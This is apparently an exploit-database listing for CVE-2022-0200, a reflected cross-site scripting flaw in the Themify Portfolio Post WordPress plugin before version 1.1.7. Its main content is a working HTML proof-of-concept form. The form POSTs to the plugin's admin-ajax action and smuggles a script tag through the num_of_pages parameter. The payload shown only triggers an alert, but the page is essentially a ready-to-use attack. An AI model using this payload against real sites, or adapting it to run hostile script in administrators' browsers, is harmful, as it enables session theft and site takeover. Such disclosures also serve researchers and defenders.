Exploit for Themify Portfolio Post < 1.1.7 - Reflected Cross-Site Scripting CVE-2022-0200

Name: Exploit for Themify Portfolio Post < 1.1.7 - Reflected Cross-Site Scripting CVE-2022-0200
Rating: 5 (133 reviews)

2022-01-14 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:BBC0B812-7B30-4AB4-BAC8-27C706B3F146
<html>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=themify_create_popup_page_pagination" method="POST">
        <input type="text" name="current_page" value=3>
        <input type="text" name="num_of_pages" value='7"><script>alert(/XSS/);</script>'>
        <input type="submit" value="Send">
    </form>
</html>